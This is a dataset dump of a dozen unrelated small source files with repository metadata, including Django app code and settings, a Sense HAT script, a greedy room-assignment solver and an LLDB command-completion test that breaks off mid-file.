ad26bb531c0dfb24ffe05ff50e2e6a77acc9fa63
|
[] |
no_license
|
brxue/sandbox
|
7ad7ea76130f0edc2ff9fc62c192131fce1242d1
|
a9cc9edd9e2233b1b90c822edd43c3c480385c58
|
refs/heads/master
| 2021-06-18T17:14:18.698560
| 2017-06-19T15:25:53
| 2017-06-19T15:25:53
| 13,215,820
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 460
|
py
|
from django.conf.urls import patterns, url
from polls import views
# URL routes for the polls app, using the Django 1.x `patterns()` API.
# NOTE(review): `patterns()` was removed in Django 1.10 — on upgrade this
# must become a plain list: `urlpatterns = [url(...), ...]`.
urlpatterns = patterns('',
    # example: /polls/
    url(r'^$', views.index, name='index'),
    # example: /polls/5/
    url(r'^(?P<question_id>\d+)/$', views.detail, name='detail'),
    # example: /polls/5/results/
    url(r'^(?P<question_id>\d+)/results/$', views.results, name='results'),
    # example: /polls/5/vote/
    url(r'^(?P<question_id>\d+)/vote/$', views.vote, name='vote'),
)
|
[
"brxue@outlook.com"
] |
brxue@outlook.com
|
bf77986a8e164ee56fb39537757225beeb6c2aff
|
ad8de5acb466940c53c92fdd08f3003581e76f56
|
/BookStore/admin/models.py
|
9cb346042f295eae21bfc9c2ed130bc7a37d6f1b
|
[
"Apache-2.0"
] |
permissive
|
peter-dinh/Bookstore
|
0343e3be9aff079589c728f6e97fa53e27b16a7c
|
b46b2d6a74f7182128f37ad86afc594ef888a153
|
refs/heads/master
| 2022-12-11T16:03:47.745078
| 2019-01-14T18:19:36
| 2019-01-14T18:19:36
| 162,212,257
| 0
| 0
|
Apache-2.0
| 2022-12-08T01:30:12
| 2018-12-18T01:26:36
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 313
|
py
|
from django.db import models
from django.contrib.auth.models import User
# Create your models here.
class Account(User):
    """Bookstore account extending Django's built-in User model.

    NOTE(review): subclassing a concrete model like User gives multi-table
    inheritance (a separate Account table joined to auth_user) — confirm
    this is intended rather than a OneToOne profile.
    """
    # Name shown in the UI (may differ from the login username).
    display_name = models.CharField(max_length=200)
    # 10-digit phone number stored as text.
    phone = models.CharField(max_length=10)
    address = models.CharField(max_length=200)
    # Application-level admin flag, distinct from User.is_staff/is_superuser.
    is_admin = models.BooleanField(default=False)
|
[
"dinhtruong018@gmail.com"
] |
dinhtruong018@gmail.com
|
c2f4971c5d784ab25b2d6261a4fdee728004dbae
|
92a69414a998830520d8b3de2eb708f61e472249
|
/venv/Scripts/pip-script.py
|
d6835ac03f979f48e608277442cd85665aa3fe10
|
[] |
no_license
|
DiegoMeruoca/Python5-Funcoes
|
cb8e78e8312f0c0d9dc0534d1cdfe5cf50c6bf82
|
b5f3def59daa2d5bbf4139eb2670be9214af6409
|
refs/heads/master
| 2021-01-26T10:55:07.963072
| 2020-02-27T02:30:48
| 2020-02-27T02:30:48
| 243,412,766
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 413
|
py
|
#!D:\ETEC\DS1\Exemplos\Funcoes\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==10.0.1','console_scripts','pip'
__requires__ = 'pip==10.0.1'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
    # Auto-generated setuptools entry-point wrapper — do not edit by hand.
    # Strip the "-script.py"/".exe" suffix so pip reports its own name cleanly.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(
        load_entry_point('pip==10.0.1', 'console_scripts', 'pip')()
    )
|
[
"diegomeruoca@gmail.com"
] |
diegomeruoca@gmail.com
|
24b2aea0aa16cdbdddcd6e00440f47ffd682e8d4
|
ddb48f204fefb1886818d8f337e64b608a874f78
|
/mymodule.py
|
4bb8392762ed4a6703e01012adc7cba9421d76ba
|
[] |
no_license
|
AlexandrKarpov712/Projects
|
71edb63b6a3bafdbf20e4ce274ecbbee89f5f74d
|
057c3f78245b3fcf2edb4155067692a8b11b4b49
|
refs/heads/main
| 2023-03-26T01:49:20.622688
| 2021-03-28T20:06:27
| 2021-03-28T20:06:27
| 345,642,670
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,617
|
py
|
"""Module for the most frequently used operations in homeworks.
Classes: TreeNode
Functions: text(g), write_to_file(data, filename="./text.txt"),
read_from_file(filename="./text.txt"),
choose_task(step, func1, func2), __init__(self, value),
choose_task_3(step, func1, func2, func3)
"""
def text(g):
    """Prompt with `g` and return the line typed by the user."""
    return input(g)
def write_to_file(data, filename="./text.txt"):
"""Writing data to a file"""
with open(filename, "wb") as f:
f.write(data)
def read_from_file(filename="./text.txt"):
"""Reading data from a file"""
with open(filename, "rb") as f:
data = f.read()
return data
def choose_task(step, func1, func2):
    """Run func1 for choice "1", func2 for "2"; otherwise ask to retry."""
    actions = {"1": func1, "2": func2}
    action = actions.get(step)
    if action is None:
        print("Повторите ввод...")
    else:
        action()
def choose_task_3(step, func1, func2, func3):
    """Run func1/func2/func3 for choices "1"/"2"/"3"; otherwise ask to retry."""
    actions = {"1": func1, "2": func2, "3": func3}
    action = actions.get(step)
    if action is None:
        print("Повторите ввод...")
    else:
        action()
class TreeNode:
    """Binary-tree node holding a value and left/right child links."""

    def __init__(self, value):
        """Create a leaf node storing `value`; both children start as None."""
        self.value = value
        self.left = None
        self.right = None
|
[
"noreply@github.com"
] |
noreply@github.com
|
51655665cb92a20e135645e272c7062cdcbd2bed
|
cf2fa0441e83e246c406afacd153b060069da757
|
/setup.py
|
842336cf8a796d8bd5d3270b0496cc9c20739777
|
[] |
no_license
|
NSO-developer/ncs_pycli
|
c41b7d586bc4ba5fd24f9cdfb95dd9324be9360e
|
1a2415136c3f2d2495d7f28b06a2a36831592a67
|
refs/heads/master
| 2022-09-04T06:12:02.889927
| 2022-08-08T05:31:13
| 2022-08-08T05:31:13
| 137,266,751
| 21
| 6
| null | 2022-08-08T05:31:14
| 2018-06-13T20:25:20
|
Python
|
UTF-8
|
Python
| false
| false
| 1,662
|
py
|
"""Package configuration for ncs_pycli."""
from setuptools import setup, find_packages
from os import path
from io import open

here = path.abspath(path.dirname(__file__))

reqs = []
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
    long_description = f.read()
with open(path.join(here, '.version'), encoding='utf-8') as f:
    # BUG FIX: strip the trailing newline the version file normally ends
    # with; previously the raw read leaked whitespace into the version.
    version = f.read().strip()
with open(path.join(here, 'requirements.txt'), encoding='utf-8') as f:
    # One requirement per line; strip surrounding whitespace/newlines.
    reqs = [each.strip() for each in f.readlines()]

setup(
    name = 'ncs_pycli',
    version = version,
    description = "Gives you an interactive NSO python shell with tab completion.",
    long_description = long_description,
    long_description_content_type = 'text/markdown',
    url = 'https://github.com/NSO-developer/ncs_pycli.git',
    author = 'Hakan Niska, Kiran Kumar Kotari',
    author_email = 'hniska@cisco.com, kkotari@cisco.com',
    entry_points={
        'console_scripts': [
            'ncs_pycli=ncs_pycli.ncs_pycli:run',
            'ncs-pycli=ncs_pycli.ncs_pycli:run',
        ],
    },
    install_requires=reqs,
    classifiers = [
        'Development Status :: 3 - Alpha',
        'Intended Audience :: Developers',
        'Topic :: Software Development :: Build Tools',
        'License :: OSI Approved :: MIT License',
        'Operating System :: OS Independent',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3.5',
        'Programming Language :: Python :: 3.6',
        'Programming Language :: Python :: 3.7',
    ],
    keywords = 'ncs-pycli ncs_pycli',
    packages = find_packages(where='.', exclude=['tests']),
    include_package_data=True,
)
|
[
"kirankotari@live.com"
] |
kirankotari@live.com
|
be25ea7ab890f57eea2e7098823dc03d47143732
|
473ecdb25e6b877cacc66028b9834f1cef7b4ffa
|
/C_extractor.py
|
6b3ee513f489ac53d579239b23812f6ffefc5e34
|
[] |
no_license
|
Charlie-Toro/automate-Python
|
0affa1b173eb0025572c60bb2bd1be97b6267c4d
|
373621b21ac16ab88a4fd149e46789527c54613c
|
refs/heads/master
| 2021-01-23T10:44:32.788218
| 2017-06-05T01:40:37
| 2017-06-05T01:40:37
| 93,088,842
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 303
|
py
|
# Contact Extractor
# Caleb Bell
# Extracts phone number and email address from text
import re,pyperclip
class Extractor:
    """Extracts contact data from text using regular expressions."""

    # Matches US-style phone numbers such as 555-123-4567.
    PHONE_REGEX = re.compile(r'\d{3}-\d{3}-\d{4}')

    def __init__(self):
        # BUG FIX: the original __init__ only defined a dead, inaccessible
        # nested function (misleadingly named email_extract) that compiled a
        # phone-number regex and was never called. Expose the compiled
        # pattern on the instance instead so callers can actually use it.
        self.phone_regex = self.PHONE_REGEX
|
[
"charles_toro@mail.com"
] |
charles_toro@mail.com
|
a74af5013611c1d1945d2e4250a4c532a725e0bd
|
6b2a8dd202fdce77c971c412717e305e1caaac51
|
/solutions_6404600001200128_0/Python/kawasaki/solve.py
|
13028d9808e7f822dbd94054186f11d1384f2212
|
[] |
no_license
|
alexandraback/datacollection
|
0bc67a9ace00abbc843f4912562f3a064992e0e9
|
076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf
|
refs/heads/master
| 2021-01-24T18:27:24.417992
| 2017-05-23T09:23:38
| 2017-05-23T09:23:38
| 84,313,442
| 2
| 4
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 371
|
py
|
# Python 2 script (raw_input/xrange and the print statement) reading
# Code-Jam-style input: T cases, each a count N and a line of N integers.
T = int(raw_input())  # number of test cases
for test_index in xrange(T):
    N = int(raw_input())  # number of readings on the next line
    m = map(int, raw_input().split())
    # y: sum of every drop between consecutive readings, i.e. the minimum
    # total decrease that explains the sequence.
    y = 0
    for i in xrange(N - 1):
        y += max(m[i] - m[i + 1], 0)
    # d: the single largest drop between consecutive readings.
    # NOTE(review): N == 1 makes this max() run on an empty sequence and
    # raise ValueError -- presumably the inputs guarantee N >= 2.
    d = max(max(m[i] - m[i + 1], 0) for i in xrange(N - 1))
    # z: total decrease assuming a constant per-step removal of d, capped
    # by the amount m[i] available at each step.
    z = 0
    for i in xrange(N - 1):
        z += min(d, m[i])
    print 'Case #{}: {} {}'.format(test_index + 1, y, z)
|
[
"eewestman@gmail.com"
] |
eewestman@gmail.com
|
7cb9bdbdeb9ae40bcb7cd2e41b2b4ef986fe95bb
|
2cfe7df2684bae48175bc5fcdf9a56bc0f07f27f
|
/dm/tags/models.py
|
89033b9a2f01152d593e75a1f0ea9ee606e44414
|
[] |
no_license
|
naveen0492/digital
|
b1bedc6fb99c54eddd681bc9a24dc134374310ad
|
5eefb59314de3b8d6f5d5ea791d10826170e8f87
|
refs/heads/master
| 2021-01-01T07:40:38.746977
| 2017-08-07T20:48:53
| 2017-08-07T20:48:53
| 97,566,537
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,492
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models
from django.db.models.signals import pre_save, post_save
from django.core.urlresolvers import reverse
from django.utils.text import slugify
# Create your models here.
from products.models import Product
class TagQuerySet(models.query.QuerySet):
    """QuerySet for Tag with a convenience filter for active rows."""
    def active(self):
        # Only tags whose `active` flag is set.
        return self.filter(active=True)
class TagManager(models.Manager):
    """Manager whose all() is restricted to active tags."""
    def get_queryset(self):
        # Hand out the custom queryset so .active() is always available.
        return TagQuerySet(self.model, using=self._db)
    def all(self, *args, **kwargs):
        # NOTE(review): overriding all() to pre-filter hides inactive tags
        # from any code that expects every row -- confirm this is intended.
        return super(TagManager, self).all(*args, **kwargs).active()
class Tag(models.Model):
    """A label that can be attached to many products."""
    title = models.CharField(max_length=120, unique=True)
    slug = models.SlugField(unique=True)  # filled by the pre_save receiver below
    products = models.ManyToManyField(Product, blank=True)
    active = models.BooleanField(default=True)
    objects = TagManager()  # default manager returns only active tags
    def __unicode__(self):
        # Python 2 string representation (this app imports unicode_literals).
        return str(self.title)
    def get_absolute_url(self):
        """Return the canonical URL for this tag's detail page."""
        view_name = "tags:detail"
        return reverse(view_name, kwargs={"slug": self.slug})
def create_slug(instance, new_slug=None):
    """Return a slug for *instance* that is unique among Tag rows.

    Recursively appends the id of the first clashing Tag until the slug
    is free.
    """
    slug = slugify(instance.title)
    if new_slug is not None:
        slug = new_slug
    # BUG FIX: uniqueness must be checked against Tag, not Product -- this
    # function slugs Tag instances (see the pre_save receiver), and checking
    # the wrong table let duplicate Tag slugs through, violating the
    # unique=True constraint on Tag.slug.
    qs = Tag.objects.filter(slug=slug)
    exists = qs.exists()
    if exists:
        new_slug = "%s-%s" %(slug, qs.first().id)
        return create_slug(instance, new_slug=new_slug)
    return slug
def tag_pre_save_reciever(sender, instance, *args, **kwargs):
    """pre_save hook: fill in a slug when the Tag has none yet.

    NOTE(review): "reciever" is a typo for "receiver"; the name is kept
    because it is referenced below and may be imported elsewhere.
    """
    if not instance.slug:
        instance.slug = create_slug(instance)
pre_save.connect(tag_pre_save_reciever, sender=Tag)
|
[
"naveen0492"
] |
naveen0492
|
e6ae49348338fd374b8ee8d340fdec8e4ded1ca5
|
76655119513727111fa16890640a46ec143f3290
|
/Lab-4/lab4.py
|
58fcd8952c64803676011d63ab109c2567193084
|
[] |
no_license
|
HovishBalgobin/SYSC3010_Hovish_Balgobin
|
6daac4edc0d291fb20fb5d65af8917302c417282
|
4bb2305fdbaebb59b3a498082861bac0d0bda757
|
refs/heads/master
| 2022-12-26T21:02:48.841069
| 2020-10-09T19:08:05
| 2020-10-09T19:08:05
| 295,850,574
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,219
|
py
|
from sense_hat import SenseHat
from time import sleep
counter = 0  # tally changed by joystick up/down events in the main loop
sense = SenseHat()
## creating a variable to make use of the SenseHat in-built functions
sense.clear()
## clearing the display
purple = (148,0,211)
##creating purple using the RGB values
def show_H():
    """Display the letter H on the LED matrix over a purple background."""
    sense.show_letter("H",back_colour= purple)
def show_B():
    """Display the letter B on the LED matrix over a purple background."""
    sense.show_letter("B", back_colour = purple)
def repeat(flag):
    """Show H when *flag* is True, B when it is False, then return the toggle."""
    if flag == True:
        show_H()
    elif flag == False:
        show_B()
    # Toggle so the next call displays the other letter.
    return not flag
selection = False  # initialising selection and Flag
Flag = True

# Event loop: any joystick press toggles the displayed letter; pushing the
# stick up/down adjusts the counter.
while True:
    events = sense.stick.get_events()
    for event in events:
        # Skip releases; presses and holds toggle the letter.
        if event.action != "released":
            Flag = repeat(Flag)
        # BUG FIX: `counter ++` / `counter --` are not valid Python (the
        # original file failed to parse); use augmented assignment.
        # BUG FIX: comparing sense.stick.get_events() (a list) to 'up'/'down'
        # was always False and also consumed pending events; inspect the
        # current event's direction instead.
        if event.direction == 'up':
            counter += 1
        if event.direction == 'down':
            counter -= 1
        selection = True
    sense.clear()
|
[
"hovishbalgobin@cmail.carleton.ca"
] |
hovishbalgobin@cmail.carleton.ca
|
635432b0aa0919407d0eb764a68554525275005c
|
fb1e23ceaccb3d4b5b648bdc8b6996ad17e46b38
|
/murr/settings.py
|
af9ec47dc3d9835d5ca1ff3537ba312861af195f
|
[] |
no_license
|
100ika/murr
|
91e7fb6c39ab505a5f883995db0195ac34f1b047
|
cc60b95fdac9416a2ce3d00ec2589ae1a99444d9
|
refs/heads/master
| 2021-09-23T12:23:11.952888
| 2020-02-04T17:41:48
| 2020-02-04T17:41:48
| 238,261,720
| 0
| 0
| null | 2021-09-22T18:30:27
| 2020-02-04T17:15:42
|
Python
|
UTF-8
|
Python
| false
| false
| 3,082
|
py
|
"""
Django settings for murr project.
Generated by 'django-admin startproject' using Django 3.0.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = ')fd3!7q(zmj^^-pyo349vr(#0=kpvlih#1ow9-7*+gmbji!6s*'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'murr.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'murr.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
|
[
"59304702+100ika@users.noreply.github.com"
] |
59304702+100ika@users.noreply.github.com
|
7421d257613858f51cd4d9f3382df003b0be3f51
|
e7ea4919d8663b0c69c57106be2d1e2c0d1aecb6
|
/greedy_20.py
|
5e7732f22d3a30b7451c097dd5b3689c541cd0a3
|
[] |
no_license
|
johnrso/new_170_proj
|
74ad6a0b6be53583e1b284bed57365ecc6798483
|
d73676947e8059c9f6d5129e474f698b8f21ced2
|
refs/heads/main
| 2023-01-22T07:05:10.798575
| 2020-12-07T00:20:11
| 2020-12-07T00:20:11
| 319,007,434
| 0
| 1
| null | 2020-12-06T11:11:49
| 2020-12-06T10:35:42
|
Python
|
UTF-8
|
Python
| false
| false
| 3,800
|
py
|
import sys
import os
import getopt
import glob
import math
import timeit
import random
import multiprocessing as mp
from utils import *
from parse import *
from os.path import *
ITERATIONS = 10 ** 5
def greedy_solve_20(G, s):
curr = {}
rooms = {}
best_happiness = 0
for i in range(20):
curr[i] = 0
if is_valid_solution(curr, G, s, 1):
return (curr, 1)
# G_copy = G.copy()
# for e in list(G_copy.edges.data()):
# if e[2]['stress'] > s / 2:
# G_copy.remove_edge(*e[:2])
edgelist = list(G.edges.data())
edgelist.sort(key = lambda x: -x[2]['happiness'])
edgelist.sort(key = lambda x: x[2]['stress'])
for i in range(20):
curr[i] = i
rooms[i] = [i]
best = (dict(curr), 20)
# print("creating prior...")
for e in edgelist:
if e[2]['stress'] > s / 5:
break
# print(e)
# print(rooms)
# print(curr)
st1, st2, _ = e
st1_num, st2_num = curr[st1], curr[st2]
st1_room, st2_room = rooms[st1_num], rooms[st2_num]
combined = st1_room + st2_room
swap_into_st1_1 = st1_room + [st2]
swap_into_st1_2 = st2_room[:]
swap_into_st2_1 = st1_room[:]
swap_into_st2_2 = st2_room + [st1]
swap_into_st1_2.remove(st2)
swap_into_st2_1.remove(st1)
curr_happ = calculate_happiness_for_room(st1_room, G) + calculate_happiness_for_room(st2_room, G)
comb_happ = calculate_happiness_for_room(combined, G)
s_st1_happ = calculate_happiness_for_room(swap_into_st1_1, G) + calculate_happiness_for_room(swap_into_st1_2, G)
s_st2_happ = calculate_happiness_for_room(swap_into_st2_1, G) + calculate_happiness_for_room(swap_into_st2_2, G)
if comb_happ >= max([curr_happ, s_st1_happ, s_st2_happ]):
for st in st2_room:
curr[st] = st1_num
rooms[st1_num] = combined
rooms[st2_num] = []
elif s_st1_happ >= max([curr_happ, comb_happ, s_st2_happ]):
curr[st2] = st1_num
rooms[st1_num] += [st2]
st2_room.remove(st2)
elif s_st2_happ >= max([curr_happ, comb_happ, s_st1_happ]):
curr[st1] = st2_num
rooms[st2_num] += [st1]
st1_room.remove(st1)
rooms = reorder_rooms(rooms)
curr = convert_dictionary(rooms)
num_rooms = max(curr.values()) + 1
if is_valid_solution(curr, G, s, num_rooms):
happ = calculate_happiness(curr, G)
if happ > best_happiness:
best_happiness = happ
best = (dict(curr), num_rooms)
print(best)
return best
def reorder_rooms(rooms):
ret = {}
count = 0
for room in rooms.values():
if room:
ret[count] = room
count += 1
return ret
# if __name__ == '__main__':
# assert len(sys.argv) == 2
# path = sys.argv[1]
# G, s = read_input_file(path)
# # read_output_file("out/test.out", G, s)
# D, k = greedy_solve_20(G, s)
# G, s = read_input_file(path)
# assert is_valid_solution(D, G, s, k)
# print("Total Happiness: {}".format(calculate_happiness(D, G)))
# write_output_file(D, 'out/test.out')
if __name__ == '__main__':
inputs = glob.glob('./all_inputs/medium-*')
ttl = len(inputs)
ct = 0
for input_path in inputs:
if ct % 50 == 0:
print("{} out of {}".format(ct, ttl))
output_path = './all_outputs/' + basename(normpath(input_path))[:-3] + '.out'
G, s = read_input_file(input_path, 20)
D, k = greedy_solve_20(G, s)
G, s = read_input_file(input_path, 20)
assert is_valid_solution(D, G, s, k)
write_output_file(D, output_path)
ct += 1
|
[
""
] | |
6b97a43edfe028b659923528eaadd406c208290f
|
71501709864eff17c873abbb97ffabbeba4cb5e3
|
/llvm13.0.0/lldb/test/API/functionalities/completion/TestCompletion.py
|
11f0e387245e0fc659032f8b1323c5e4f7f230db
|
[
"NCSA",
"Apache-2.0",
"LLVM-exception"
] |
permissive
|
LEA0317/LLVM-VideoCore4
|
d08ba6e6f26f7893709d3285bdbd67442b3e1651
|
7ae2304339760685e8b5556aacc7e9eee91de05c
|
refs/heads/master
| 2022-06-22T15:15:52.112867
| 2022-06-09T08:45:24
| 2022-06-09T08:45:24
| 189,765,789
| 1
| 0
|
NOASSERTION
| 2019-06-01T18:31:29
| 2019-06-01T18:31:29
| null |
UTF-8
|
Python
| false
| false
| 33,655
|
py
|
"""
Test the lldb command line completion mechanism.
"""
import os
from multiprocessing import Process
import lldb
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbplatform
from lldbsuite.test import lldbutil
class CommandLineCompletionTestCase(TestBase):
mydir = TestBase.compute_mydir(__file__)
NO_DEBUG_INFO_TESTCASE = True
@classmethod
def classCleanup(cls):
"""Cleanup the test byproducts."""
try:
os.remove("child_send.txt")
os.remove("child_read.txt")
except:
pass
def test_at(self):
"""Test that 'at' completes to 'attach '."""
self.complete_from_to('at', 'attach ')
def test_de(self):
"""Test that 'de' completes to 'detach '."""
self.complete_from_to('de', 'detach ')
def test_frame_variable(self):
self.build()
self.main_source = "main.cpp"
self.main_source_spec = lldb.SBFileSpec(self.main_source)
(target, process, thread, bkpt) = lldbutil.run_to_source_breakpoint(self,
'// Break here', self.main_source_spec)
self.assertEquals(process.GetState(), lldb.eStateStopped)
# Since CommandInterpreter has been corrected to update the current execution
# context at the beginning of HandleCompletion, we're here explicitly testing
# the scenario where "frame var" is completed without any preceding commands.
self.complete_from_to('frame variable fo',
'frame variable fooo')
self.complete_from_to('frame variable fooo.',
'frame variable fooo.')
self.complete_from_to('frame variable fooo.dd',
'frame variable fooo.dd')
self.complete_from_to('frame variable ptr_fooo->',
'frame variable ptr_fooo->')
self.complete_from_to('frame variable ptr_fooo->dd',
'frame variable ptr_fooo->dd')
self.complete_from_to('frame variable cont',
'frame variable container')
self.complete_from_to('frame variable container.',
'frame variable container.MemberVar')
self.complete_from_to('frame variable container.Mem',
'frame variable container.MemberVar')
self.complete_from_to('frame variable ptr_cont',
'frame variable ptr_container')
self.complete_from_to('frame variable ptr_container->',
'frame variable ptr_container->MemberVar')
self.complete_from_to('frame variable ptr_container->Mem',
'frame variable ptr_container->MemberVar')
def test_process_attach_dash_dash_con(self):
"""Test that 'process attach --con' completes to 'process attach --continue '."""
self.complete_from_to(
'process attach --con',
'process attach --continue ')
def test_process_launch_arch(self):
self.complete_from_to('process launch --arch ',
['mips',
'arm64'])
def test_process_load(self):
self.build()
lldbutil.run_to_source_breakpoint(self, '// Break here', lldb.SBFileSpec("main.cpp"))
self.complete_from_to('process load Makef', 'process load Makefile')
@skipUnlessPlatform(["linux"])
def test_process_unload(self):
"""Test the completion for "process unload <index>" """
# This tab completion should not work without a running process.
self.complete_from_to('process unload ',
'process unload ')
self.build()
lldbutil.run_to_source_breakpoint(self, '// Break here', lldb.SBFileSpec("main.cpp"))
err = lldb.SBError()
self.process().LoadImage(lldb.SBFileSpec(self.getBuildArtifact("libshared.so")), err)
self.assertSuccess(err)
self.complete_from_to('process unload ',
'process unload 0')
self.process().UnloadImage(0)
self.complete_from_to('process unload ',
'process unload ')
def test_process_plugin_completion(self):
subcommands = ['attach -P', 'connect -p', 'launch -p']
for subcommand in subcommands:
self.complete_from_to('process ' + subcommand + ' mac',
'process ' + subcommand + ' mach-o-core')
def completions_contain_str(self, input, needle):
interp = self.dbg.GetCommandInterpreter()
match_strings = lldb.SBStringList()
num_matches = interp.HandleCompletion(input, len(input), 0, -1, match_strings)
found_needle = False
for match in match_strings:
if needle in match:
found_needle = True
break
self.assertTrue(found_needle, "Returned completions: " + "\n".join(match_strings))
@skipIfRemote
@skipIfReproducer
def test_common_completion_process_pid_and_name(self):
# The LLDB process itself and the process already attached to are both
# ignored by the process discovery mechanism, thus we need a process known
# to us here.
self.build()
server = self.spawnSubprocess(
self.getBuildArtifact("a.out"),
["-x"], # Arg "-x" makes the subprocess wait for input thus it won't be terminated too early
install_remote=False)
self.assertIsNotNone(server)
pid = server.pid
self.completions_contain('process attach -p ', [str(pid)])
self.completions_contain('platform process attach -p ', [str(pid)])
self.completions_contain('platform process info ', [str(pid)])
self.completions_contain_str('process attach -n ', "a.out")
self.completions_contain_str('platform process attach -n ', "a.out")
def test_process_signal(self):
# The tab completion for "process signal" won't work without a running process.
self.complete_from_to('process signal ',
'process signal ')
# Test with a running process.
self.build()
self.main_source = "main.cpp"
self.main_source_spec = lldb.SBFileSpec(self.main_source)
lldbutil.run_to_source_breakpoint(self, '// Break here', self.main_source_spec)
self.complete_from_to('process signal ',
'process signal SIG')
self.complete_from_to('process signal SIGPIP',
'process signal SIGPIPE')
self.complete_from_to('process signal SIGA',
['SIGABRT',
'SIGALRM'])
def test_ambiguous_long_opt(self):
self.completions_match('breakpoint modify --th',
['--thread-id',
'--thread-index',
'--thread-name'])
def test_disassemble_dash_f(self):
self.completions_match('disassemble -F ',
['default',
'intel',
'att'])
def test_plugin_load(self):
self.complete_from_to('plugin load ', [])
def test_log_enable(self):
self.complete_from_to('log enable ll', ['lldb'])
self.complete_from_to('log enable dw', ['dwarf'])
self.complete_from_to('log enable lldb al', ['all'])
self.complete_from_to('log enable lldb sym', ['symbol'])
def test_log_enable(self):
self.complete_from_to('log disable ll', ['lldb'])
self.complete_from_to('log disable dw', ['dwarf'])
self.complete_from_to('log disable lldb al', ['all'])
self.complete_from_to('log disable lldb sym', ['symbol'])
def test_log_list(self):
self.complete_from_to('log list ll', ['lldb'])
self.complete_from_to('log list dw', ['dwarf'])
self.complete_from_to('log list ll', ['lldb'])
self.complete_from_to('log list lldb dwa', ['dwarf'])
def test_quoted_command(self):
self.complete_from_to('"set',
['"settings" '])
def test_quoted_arg_with_quoted_command(self):
self.complete_from_to('"settings" "repl',
['"replace" '])
def test_quoted_arg_without_quoted_command(self):
self.complete_from_to('settings "repl',
['"replace" '])
def test_single_quote_command(self):
self.complete_from_to("'set",
["'settings' "])
def test_terminated_quote_command(self):
# This should not crash, but we don't get any
# reasonable completions from this.
self.complete_from_to("'settings'", [])
def test_process_launch_arch_arm(self):
self.complete_from_to('process launch --arch arm',
['arm64'])
def test_target_symbols_add_shlib(self):
# Doesn't seem to work, but at least it shouldn't crash.
self.complete_from_to('target symbols add --shlib ', [])
def test_log_file(self):
# Complete in our source directory which contains a 'main.cpp' file.
src_dir = os.path.dirname(os.path.realpath(__file__)) + '/'
self.complete_from_to('log enable lldb expr -f ' + src_dir,
['main.cpp'])
def test_log_dir(self):
# Complete our source directory.
src_dir = os.path.dirname(os.path.realpath(__file__))
self.complete_from_to('log enable lldb expr -f ' + src_dir,
[src_dir + os.sep], turn_off_re_match=True)
# <rdar://problem/11052829>
def test_infinite_loop_while_completing(self):
"""Test that 'process print hello\' completes to itself and does not infinite loop."""
self.complete_from_to('process print hello\\', 'process print hello\\',
turn_off_re_match=True)
def test_watchpoint_co(self):
"""Test that 'watchpoint co' completes to 'watchpoint command '."""
self.complete_from_to('watchpoint co', 'watchpoint command ')
def test_watchpoint_command_space(self):
"""Test that 'watchpoint command ' completes to ['add', 'delete', 'list']."""
self.complete_from_to(
'watchpoint command ', [
'add', 'delete', 'list'])
def test_watchpoint_command_a(self):
"""Test that 'watchpoint command a' completes to 'watchpoint command add '."""
self.complete_from_to(
'watchpoint command a',
'watchpoint command add ')
def test_watchpoint_set_ex(self):
